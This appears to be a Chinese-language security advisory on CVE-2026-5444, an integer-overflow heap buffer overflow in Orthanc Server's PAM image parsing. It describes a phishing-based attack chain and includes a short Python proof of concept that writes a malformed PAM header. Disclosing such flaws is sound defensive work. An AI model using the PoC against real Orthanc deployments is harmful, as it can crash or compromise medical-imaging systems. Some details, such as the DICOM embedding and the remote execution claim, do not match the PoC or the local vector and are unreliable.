CVE-2026-5444 Orthanc PAM解析堆缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-5444

漏洞类型

堆缓冲区溢出

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Orthanc Server

漏洞概述

Orthanc服务器在处理DICOM文件中嵌入的PAM图像时存在严重的堆缓冲区溢出漏洞。该漏洞源于对图像尺寸计算的不当处理。攻击者可利用精心构造的图像宽高值，在32位无符号算术计算中触发整数溢出。这导致程序错误地分配了一个极小的缓冲区，而在后续的像素处理过程中，程序仍按原始大尺寸向该缓冲区写入大量数据，从而引发严重的堆溢出。该漏洞可能导致应用程序崩溃或任意代码执行，对系统的完整性和可用性造成严重影响。

技术细节

漏洞根源位于Orthanc服务器的PAM图像解析逻辑之中，具体触发场景为处理嵌入了恶意PAM图像的DICOM文件。在解析过程中，程序需要根据图像的宽度、高度和颜色深度计算所需缓冲区的大小，此处使用了不安全的32位无符号整数乘法运算。攻击者可以构造特殊的图像头信息，例如将宽度和高度设置为极大的数值，使得它们的乘积在32位空间内发生整数溢出，回绕为一个极小的正整数。程序随后基于这个溢出后的错误值分配内存，导致缓冲区大小严重不足。然而，后续的像素数据处理循环并未检测此异常，仍依据原始的巨大尺寸参数进行数据写入操作。这种“分配小、写入大”的不匹配导致了严重的堆缓冲区溢出，攻击者可利用此漏洞破坏堆结构，进而可能实现拒绝服务攻击或远程代码执行。

攻击链分析

STEP 1

侦察

攻击者确认目标系统正在使用受影响的Orthanc服务器版本。

STEP 2

武器化

攻击者利用脚本生成包含恶意PAM图像的DICOM文件，该文件包含会导致整数溢出的尺寸参数。

STEP 3

投递

攻击者通过网络钓鱼或物理访问等方式，诱骗受害者将恶意DICOM文件导入Orthanc系统。

STEP 4

利用

当Orthanc处理该文件时，触发整数溢出，导致堆缓冲区溢出。

STEP 5

执行

溢出数据覆盖关键内存区域，导致服务崩溃（DoS）或执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-5444
# This script generates a crafted PAM file designed to trigger the integer overflow.

import struct

def create_malformed_pam(filename):
    # PAM Header format: P7\nWIDTH <w>\nHEIGHT <h>\nDEPTH 4\nMAXVAL 255\nTUPLTYPE RGB_ALPHA\nENDHDR\n
    # We aim for: width * height * 4 to overflow 32-bit integer.
    # Example: 0x10000000 * 0x10 = 0x100000000 (overflows to 0)
    width = 0x10000000
    height = 0x10
    depth = 4
    
    header = f"P7\nWIDTH {width}\nHEIGHT {height}\nDEPTH {depth}\nMAXVAL 255\nTUPLTYPE RGB_ALPHA\nENDHDR\n"
    
    # Payload data (minimal to avoid huge file size, but loop will try to write width*height*depth bytes)
    # The actual exploit relies on the parser allocating based on the overflowed size (0)
    # but looping through width*height.
    payload = b"A" * 100 
    
    with open(filename, 'wb') as f:
        f.write(header.encode('ascii'))
        f.write(payload)
        
print("Generating crafted PAM file...")
create_malformed_pam("cve_2026_5444_exploit.pam")
print("File created. Import this into Orthanc to trigger the vulnerability.")

影响范围

Orthanc Server (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

建议用户不要导入来源不明的DICOM文件，并限制对Orthanc服务器的文件上传权限，直到应用官方补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5444
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5444
3 Details https://www.cvedetails.com/cve/CVE-2026-5444/
4 VulDB https://vuldb.com/cve/CVE-2026-5444
5 Link https://kb.cert.org/vuls/id/536588
6 Link https://www.machinespirits.de/
7 Link https://www.orthanc-server.com/